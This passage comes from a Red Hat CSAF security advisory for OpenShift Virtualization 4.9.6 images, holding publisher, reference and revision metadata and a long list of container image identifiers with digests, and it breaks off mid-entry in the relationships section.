Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6681", url: "https://access.redhat.com/errata/RHSA-2022:6681", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2092269", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092269", }, { category: "external", summary: "2097313", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2097313", }, { category: "external", summary: "2101174", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2101174", }, { category: "external", summary: "2110783", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2110783", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "2118317", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2118317", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6681.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.9.6 Images security and bug fix update", tracking: { current_release_date: "2025-03-19T16:46:12+00:00", generator: { date: "2025-03-19T16:46:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.1", }, }, id: "RHSA-2022:6681", initial_release_date: "2022-09-22T08:16:30+00:00", revision_history: [ { date: "2022-09-22T08:16:30+00:00", number: "1", summary: "Initial version", }, { date: "2022-09-22T08:16:30+00:00", number: "2", summary: "Last updated version", }, { date: "2025-03-19T16:46:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.9 for RHEL 8", product: { name: "CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.9::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product_id: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", product_identification_helper: { purl: "pkg:oci/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/bridge-marker&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product: { name: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_id: "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64", product_identification_helper: { purl: "pkg:oci/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product: { name: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_id: "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64", product_identification_helper: { purl: "pkg:oci/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product: { name: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_id: "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64", product_identification_helper: { purl: "pkg:oci/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8&tag=v4.9.6-7", }, }, }, { category: "product_version", name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product: { name: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_id: "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64", product_identification_helper: { purl: "pkg:oci/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry&tag=v4.9.6-51", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product: { name: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_id: "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64", product_identification_helper: { purl: "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product: { name: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_id: "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64", product_identification_helper: { purl: "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product: { name: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_id: "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64", product_identification_helper: { purl: "pkg:oci/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubemacpool&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product: { name: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_id: "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator&tag=v4.9.6-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product: { name: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_id: "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator&tag=v4.9.6-6", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product: { name: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_id: "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64", product_identification_helper: { purl: "pkg:oci/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product: { name: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_id: "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product: { name: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_id: "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64", product_identification_helper: { purl: "pkg:oci/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product: { name: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_id: "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64", product_identification_helper: { purl: "pkg:oci/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-api&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product: { name: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_id: "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64", product_identification_helper: { purl: "pkg:oci/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product: { name: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_id: "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product: { name: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_id: "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product: { name: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_id: "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product: { name: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_id: "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product: { name: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_id: "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_id: "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product: { name: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_id: "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64", product_identification_helper: { purl: "pkg:oci/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver&tag=v4.9.6-4", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product: { name: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_id: "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64", product_identification_helper: { purl: "pkg:oci/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-controller&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product: { name: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_id: "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64", product_identification_helper: { purl: "pkg:oci/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-handler&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product: { name: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_id: "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64", product_identification_helper: { purl: "pkg:oci/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virtio-win&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product: { name: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_id: "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64", product_identification_helper: { purl: "pkg:oci/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-launcher&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product: { name: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_id: "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64", product_identification_helper: { purl: "pkg:oci/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/virt-operator&tag=v4.9.6-9", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.9.6-3", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.9.6-3", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64 as a component of CNV 4.9 for RHEL 8", product_id: "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", }, product_reference: "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64", relates_to_product_reference: "8Base-CNV-4.9", }, { category: "default_component_of", full_product_name: { name: 